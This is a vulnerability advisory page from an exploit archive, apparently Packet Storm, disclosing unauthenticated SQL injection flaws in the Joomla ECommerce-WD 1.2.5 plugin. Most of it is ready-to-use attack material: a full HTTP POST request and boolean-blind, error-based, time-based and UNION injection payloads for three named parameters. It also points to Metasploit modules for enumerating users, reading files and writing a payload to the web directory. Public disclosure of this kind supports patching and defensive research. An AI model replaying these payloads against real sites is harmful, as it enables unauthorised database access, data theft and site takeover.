exploit the possibilities

Joomla ECommerce-WD 1.2.5 SQL Injection

Joomla ECommerce-WD 1.2.5 SQL Injection
Posted Mar 19, 2015
Authored by Brandon Perry

Joomla ECommerce-WD plugin version 1.2.5 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
MD5 | da188df7cade95bd85ba4bb44c0bd9c2

Joomla ECommerce-WD 1.2.5 SQL Injection

Change Mirror Download
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
unauthenticated SQL injections available via the advanced search
functionality.

http://extensions.joomla.org/extension/ecommerce-wd

The vulnerable parameters are search_category_id, sort_order, and
filter_manufacturer_ids within the following request:

POST
/index.php?option=com_ecommercewd&controller=products&task=displayproducts
HTTP/1.1
Host: 172.31.16.49
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101
Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120
Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321

product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12


Vectors:

Parameter: filter_manufacturer_ids (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND 8066=8066 AND
(7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
(1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: search_category_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND 3039=3039 AND
(6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
(1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: sort_order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
(CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM
INFORMATION_SCHEMA.CHARACTER_SETS)
END))&pagination_limit_start=0&pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
(CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM
INFORMATION_SCHEMA.CHARACTER_SETS)
END))&pagination_limit_start=0&pagination_limit=12


Metasploit modules that exploit the UNION-based injection are available on
ExploitHub:

Enumerate users --
https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html
Read files --
https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html
Write payload to web directory --
https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close